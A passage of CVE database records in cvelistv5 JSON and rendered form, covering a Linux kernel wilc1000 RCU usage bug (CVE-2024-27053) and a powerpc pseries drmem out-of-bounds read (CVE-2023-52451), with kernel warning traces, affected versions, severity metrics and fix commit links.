"assignerShortName": "Linux",
"cveId": "CVE-2023-52457",
"datePublished": "2024-02-23T14:46:19.772Z",
"dateReserved": "2024-02-20T12:30:33.294Z",
"dateUpdated": "2025-05-04T12:49:03.340Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27053 (GCVE-0-2024-27053)
Vulnerability from cvelistv5
Published
2024-05-01 12:54
Modified
2025-05-04 09:03
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: wilc1000: fix RCU usage in connect path
With lockdep enabled, calls to the connect function from cfg802.11 layer
lead to the following warning:
=============================
WARNING: suspicious RCU usage
6.7.0-rc1-wt+ #333 Not tainted
-----------------------------
drivers/net/wireless/microchip/wilc1000/hif.c:386
suspicious rcu_dereference_check() usage!
[...]
stack backtrace:
CPU: 0 PID: 100 Comm: wpa_supplicant Not tainted 6.7.0-rc1-wt+ #333
Hardware name: Atmel SAMA5
unwind_backtrace from show_stack+0x18/0x1c
show_stack from dump_stack_lvl+0x34/0x48
dump_stack_lvl from wilc_parse_join_bss_param+0x7dc/0x7f4
wilc_parse_join_bss_param from connect+0x2c4/0x648
connect from cfg80211_connect+0x30c/0xb74
cfg80211_connect from nl80211_connect+0x860/0xa94
nl80211_connect from genl_rcv_msg+0x3fc/0x59c
genl_rcv_msg from netlink_rcv_skb+0xd0/0x1f8
netlink_rcv_skb from genl_rcv+0x2c/0x3c
genl_rcv from netlink_unicast+0x3b0/0x550
netlink_unicast from netlink_sendmsg+0x368/0x688
netlink_sendmsg from ____sys_sendmsg+0x190/0x430
____sys_sendmsg from ___sys_sendmsg+0x110/0x158
___sys_sendmsg from sys_sendmsg+0xe8/0x150
sys_sendmsg from ret_fast_syscall+0x0/0x1c
This warning is emitted because in the connect path, when trying to parse
target BSS parameters, we dereference a RCU pointer whithout being in RCU
critical section.
Fix RCU dereference usage by moving it to a RCU read critical section. To
avoid wrapping the whole wilc_parse_join_bss_param under the critical
section, just use the critical section to copy ies data
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c460495ee072fc01a9b1e8d72c179510418cafac Version: c460495ee072fc01a9b1e8d72c179510418cafac Version: c460495ee072fc01a9b1e8d72c179510418cafac Version: c460495ee072fc01a9b1e8d72c179510418cafac Version: c460495ee072fc01a9b1e8d72c179510418cafac Version: c460495ee072fc01a9b1e8d72c179510418cafac Version: c460495ee072fc01a9b1e8d72c179510418cafac Version: c460495ee072fc01a9b1e8d72c179510418cafac |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "e556006de4ea",
"status": "affected",
"version": "c460495ee072",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "b4bbf38c350a",
"status": "affected",
"version": "c460495ee072",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "d80fc436751c",
"status": "affected",
"version": "c460495ee072",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "745003b5917b",
"status": "affected",
"version": "c460495ee072",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "4bfd20d5f5c",
"status": "affected",
"version": "c460495ee072",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5800ec78775c",
"status": "affected",
"version": "c460495ee072",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "dd50d3ead6e3",
"status": "affected",
"version": "c460495ee072",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "205c50306acf",
"status": "affected",
"version": "c460495ee072",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.5",
"status": "unaffected",
"version": "5.4.273",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.16",
"status": "unaffected",
"version": "5.15.153",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.2",
"status": "unaffected",
"version": "6.1.83",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.7",
"status": "unaffected",
"version": "6.6.23",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.8",
"status": "unaffected",
"version": "6.7.11",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.9"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:5.1:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "5.1"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.11",
"status": "unaffected",
"version": "5.10.214",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.9",
"status": "unaffected",
"version": "6.8.2",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-27053",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-05T20:53:59.281892Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-05T20:56:44.439Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.869Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e556006de4ea93abe2b46cba202a2556c544b8b2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b4bbf38c350acb6500cbe667b1e2e68f896e4b38"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d80fc436751cfa6b02a8eda74eb6cce7dadfe5a2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/745003b5917b610352f52fe0d11ef658d6471ec2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4bfd20d5f5c62b5495d6c0016ee6933bd3add7ce"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5800ec78775c0cd646f71eb9bf8402fb794807de"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dd50d3ead6e3707bb0a5df7cc832730c93ace3a7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/205c50306acf58a335eb19fa84e40140f4fe814f"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/microchip/wilc1000/hif.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e556006de4ea93abe2b46cba202a2556c544b8b2",
"status": "affected",
"version": "c460495ee072fc01a9b1e8d72c179510418cafac",
"versionType": "git"
},
{
"lessThan": "b4bbf38c350acb6500cbe667b1e2e68f896e4b38",
"status": "affected",
"version": "c460495ee072fc01a9b1e8d72c179510418cafac",
"versionType": "git"
},
{
"lessThan": "d80fc436751cfa6b02a8eda74eb6cce7dadfe5a2",
"status": "affected",
"version": "c460495ee072fc01a9b1e8d72c179510418cafac",
"versionType": "git"
},
{
"lessThan": "745003b5917b610352f52fe0d11ef658d6471ec2",
"status": "affected",
"version": "c460495ee072fc01a9b1e8d72c179510418cafac",
"versionType": "git"
},
{
"lessThan": "4bfd20d5f5c62b5495d6c0016ee6933bd3add7ce",
"status": "affected",
"version": "c460495ee072fc01a9b1e8d72c179510418cafac",
"versionType": "git"
},
{
"lessThan": "5800ec78775c0cd646f71eb9bf8402fb794807de",
"status": "affected",
"version": "c460495ee072fc01a9b1e8d72c179510418cafac",
"versionType": "git"
},
{
"lessThan": "dd50d3ead6e3707bb0a5df7cc832730c93ace3a7",
"status": "affected",
"version": "c460495ee072fc01a9b1e8d72c179510418cafac",
"versionType": "git"
},
{
"lessThan": "205c50306acf58a335eb19fa84e40140f4fe814f",
"status": "affected",
"version": "c460495ee072fc01a9b1e8d72c179510418cafac",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/microchip/wilc1000/hif.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: wilc1000: fix RCU usage in connect path\n\nWith lockdep enabled, calls to the connect function from cfg802.11 layer\nlead to the following warning:\n\n=============================\nWARNING: suspicious RCU usage\n6.7.0-rc1-wt+ #333 Not tainted\n-----------------------------\ndrivers/net/wireless/microchip/wilc1000/hif.c:386\nsuspicious rcu_dereference_check() usage!\n[...]\nstack backtrace:\nCPU: 0 PID: 100 Comm: wpa_supplicant Not tainted 6.7.0-rc1-wt+ #333\nHardware name: Atmel SAMA5\n unwind_backtrace from show_stack+0x18/0x1c\n show_stack from dump_stack_lvl+0x34/0x48\n dump_stack_lvl from wilc_parse_join_bss_param+0x7dc/0x7f4\n wilc_parse_join_bss_param from connect+0x2c4/0x648\n connect from cfg80211_connect+0x30c/0xb74\n cfg80211_connect from nl80211_connect+0x860/0xa94\n nl80211_connect from genl_rcv_msg+0x3fc/0x59c\n genl_rcv_msg from netlink_rcv_skb+0xd0/0x1f8\n netlink_rcv_skb from genl_rcv+0x2c/0x3c\n genl_rcv from netlink_unicast+0x3b0/0x550\n netlink_unicast from netlink_sendmsg+0x368/0x688\n netlink_sendmsg from ____sys_sendmsg+0x190/0x430\n ____sys_sendmsg from ___sys_sendmsg+0x110/0x158\n ___sys_sendmsg from sys_sendmsg+0xe8/0x150\n sys_sendmsg from ret_fast_syscall+0x0/0x1c\n\nThis warning is emitted because in the connect path, when trying to parse\ntarget BSS parameters, we dereference a RCU pointer whithout being in RCU\ncritical section.\nFix RCU dereference usage by moving it to a RCU read critical section. To\navoid wrapping the whole wilc_parse_join_bss_param under the critical\nsection, just use the critical section to copy ies data"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:03:12.080Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e556006de4ea93abe2b46cba202a2556c544b8b2"
},
{
"url": "https://git.kernel.org/stable/c/b4bbf38c350acb6500cbe667b1e2e68f896e4b38"
},
{
"url": "https://git.kernel.org/stable/c/d80fc436751cfa6b02a8eda74eb6cce7dadfe5a2"
},
{
"url": "https://git.kernel.org/stable/c/745003b5917b610352f52fe0d11ef658d6471ec2"
},
{
"url": "https://git.kernel.org/stable/c/4bfd20d5f5c62b5495d6c0016ee6933bd3add7ce"
},
{
"url": "https://git.kernel.org/stable/c/5800ec78775c0cd646f71eb9bf8402fb794807de"
},
{
"url": "https://git.kernel.org/stable/c/dd50d3ead6e3707bb0a5df7cc832730c93ace3a7"
},
{
"url": "https://git.kernel.org/stable/c/205c50306acf58a335eb19fa84e40140f4fe814f"
}
],
"title": "wifi: wilc1000: fix RCU usage in connect path",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27053",
"datePublished": "2024-05-01T12:54:45.964Z",
"dateReserved": "2024-02-19T14:20:24.214Z",
"dateUpdated": "2025-05-04T09:03:12.080Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52451 (GCVE-0-2023-52451)
Vulnerability from cvelistv5
Published
2024-02-22 16:21
Modified
2025-05-04 07:36
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
powerpc/pseries/memhp: Fix access beyond end of drmem array
dlpar_memory_remove_by_index() may access beyond the bounds of the
drmem lmb array when the LMB lookup fails to match an entry with the
given DRC index. When the search fails, the cursor is left pointing to
&drmem_info->lmbs[drmem_info->n_lmbs], which is one element past the
last valid entry in the array. The debug message at the end of the
function then dereferences this pointer:
pr_debug("Failed to hot-remove memory at %llx\n",
lmb->base_addr);
This was found by inspection and confirmed with KASAN:
pseries-hotplug-mem: Attempting to hot-remove LMB, drc index 1234
==================================================================
BUG: KASAN: slab-out-of-bounds in dlpar_memory+0x298/0x1658
Read of size 8 at addr c000000364e97fd0 by task bash/949
dump_stack_lvl+0xa4/0xfc (unreliable)
print_report+0x214/0x63c
kasan_report+0x140/0x2e0
__asan_load8+0xa8/0xe0
dlpar_memory+0x298/0x1658
handle_dlpar_errorlog+0x130/0x1d0
dlpar_store+0x18c/0x3e0
kobj_attr_store+0x68/0xa0
sysfs_kf_write+0xc4/0x110
kernfs_fop_write_iter+0x26c/0x390
vfs_write+0x2d4/0x4e0
ksys_write+0xac/0x1a0
system_call_exception+0x268/0x530
system_call_vectored_common+0x15c/0x2ec
Allocated by task 1:
kasan_save_stack+0x48/0x80
kasan_set_track+0x34/0x50
kasan_save_alloc_info+0x34/0x50
__kasan_kmalloc+0xd0/0x120
__kmalloc+0x8c/0x320
kmalloc_array.constprop.0+0x48/0x5c
drmem_init+0x2a0/0x41c
do_one_initcall+0xe0/0x5c0
kernel_init_freeable+0x4ec/0x5a0
kernel_init+0x30/0x1e0
ret_from_kernel_user_thread+0x14/0x1c
The buggy address belongs to the object at c000000364e80000
which belongs to the cache kmalloc-128k of size 131072
The buggy address is located 0 bytes to the right of
allocated 98256-byte region [c000000364e80000, c000000364e97fd0)
==================================================================
pseries-hotplug-mem: Failed to hot-remove memory at 0
Log failed lookups with a separate message and dereference the
cursor only when it points to a valid entry.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 51925fb3c5c901aa06cdc853268a6e19e19bcdc7 Version: 51925fb3c5c901aa06cdc853268a6e19e19bcdc7 Version: 51925fb3c5c901aa06cdc853268a6e19e19bcdc7 Version: 51925fb3c5c901aa06cdc853268a6e19e19bcdc7 Version: 51925fb3c5c901aa06cdc853268a6e19e19bcdc7 Version: 51925fb3c5c901aa06cdc853268a6e19e19bcdc7 Version: 51925fb3c5c901aa06cdc853268a6e19e19bcdc7 Version: 51925fb3c5c901aa06cdc853268a6e19e19bcdc7 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52451",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-22T20:29:32.183324Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:57.905Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T22:55:41.646Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bb79613a9a704469ddb8d6c6029d532a5cea384c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9b5f03500bc5b083c0df696d7dd169d7ef3dd0c7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b582aa1f66411d4adcc1aa55b8c575683fb4687e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/999a27b3ce9a69d54ccd5db000ec3a447bc43e6d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/026fd977dc50ff4a5e09bfb0603557f104d3f3a0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/df16afba2378d985359812c865a15c05c70a967e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/708a4b59baad96c4718dc0bd3a3427d3ab22fedc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bd68ffce69f6cf8ddd3a3c32549d1d2275e49fc5"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/powerpc/platforms/pseries/hotplug-memory.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "bb79613a9a704469ddb8d6c6029d532a5cea384c",
"status": "affected",
"version": "51925fb3c5c901aa06cdc853268a6e19e19bcdc7",
"versionType": "git"
},
{
"lessThan": "9b5f03500bc5b083c0df696d7dd169d7ef3dd0c7",
"status": "affected",
"version": "51925fb3c5c901aa06cdc853268a6e19e19bcdc7",
"versionType": "git"
},
{
"lessThan": "b582aa1f66411d4adcc1aa55b8c575683fb4687e",
"status": "affected",
"version": "51925fb3c5c901aa06cdc853268a6e19e19bcdc7",
"versionType": "git"
},
{
"lessThan": "999a27b3ce9a69d54ccd5db000ec3a447bc43e6d",
"status": "affected",
"version": "51925fb3c5c901aa06cdc853268a6e19e19bcdc7",
"versionType": "git"
},
{
"lessThan": "026fd977dc50ff4a5e09bfb0603557f104d3f3a0",
"status": "affected",
"version": "51925fb3c5c901aa06cdc853268a6e19e19bcdc7",
"versionType": "git"
},
{
"lessThan": "df16afba2378d985359812c865a15c05c70a967e",
"status": "affected",
"version": "51925fb3c5c901aa06cdc853268a6e19e19bcdc7",
"versionType": "git"
},
{
"lessThan": "708a4b59baad96c4718dc0bd3a3427d3ab22fedc",
"status": "affected",
"version": "51925fb3c5c901aa06cdc853268a6e19e19bcdc7",
"versionType": "git"
},
{
"lessThan": "bd68ffce69f6cf8ddd3a3c32549d1d2275e49fc5",
"status": "affected",
"version": "51925fb3c5c901aa06cdc853268a6e19e19bcdc7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/powerpc/platforms/pseries/hotplug-memory.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.1"
},
{
"lessThan": "4.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/pseries/memhp: Fix access beyond end of drmem array\n\ndlpar_memory_remove_by_index() may access beyond the bounds of the\ndrmem lmb array when the LMB lookup fails to match an entry with the\ngiven DRC index. When the search fails, the cursor is left pointing to\n\u0026drmem_info-\u003elmbs[drmem_info-\u003en_lmbs], which is one element past the\nlast valid entry in the array. The debug message at the end of the\nfunction then dereferences this pointer:\n\n pr_debug(\"Failed to hot-remove memory at %llx\\n\",\n lmb-\u003ebase_addr);\n\nThis was found by inspection and confirmed with KASAN:\n\n pseries-hotplug-mem: Attempting to hot-remove LMB, drc index 1234\n ==================================================================\n BUG: KASAN: slab-out-of-bounds in dlpar_memory+0x298/0x1658\n Read of size 8 at addr c000000364e97fd0 by task bash/949\n\n dump_stack_lvl+0xa4/0xfc (unreliable)\n print_report+0x214/0x63c\n kasan_report+0x140/0x2e0\n __asan_load8+0xa8/0xe0\n dlpar_memory+0x298/0x1658\n handle_dlpar_errorlog+0x130/0x1d0\n dlpar_store+0x18c/0x3e0\n kobj_attr_store+0x68/0xa0\n sysfs_kf_write+0xc4/0x110\n kernfs_fop_write_iter+0x26c/0x390\n vfs_write+0x2d4/0x4e0\n ksys_write+0xac/0x1a0\n system_call_exception+0x268/0x530\n system_call_vectored_common+0x15c/0x2ec\n\n Allocated by task 1:\n kasan_save_stack+0x48/0x80\n kasan_set_track+0x34/0x50\n kasan_save_alloc_info+0x34/0x50\n __kasan_kmalloc+0xd0/0x120\n __kmalloc+0x8c/0x320\n kmalloc_array.constprop.0+0x48/0x5c\n drmem_init+0x2a0/0x41c\n do_one_initcall+0xe0/0x5c0\n kernel_init_freeable+0x4ec/0x5a0\n kernel_init+0x30/0x1e0\n ret_from_kernel_user_thread+0x14/0x1c\n\n The buggy address belongs to the object at c000000364e80000\n which belongs to the cache kmalloc-128k of size 131072\n The buggy address is located 0 bytes to the right of\n allocated 98256-byte region [c000000364e80000, c000000364e97fd0)\n\n ==================================================================\n pseries-hotplug-mem: Failed to hot-remove memory at 0\n\nLog failed lookups with a separate message and dereference the\ncursor only when it points to a valid entry."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:36:49.045Z",
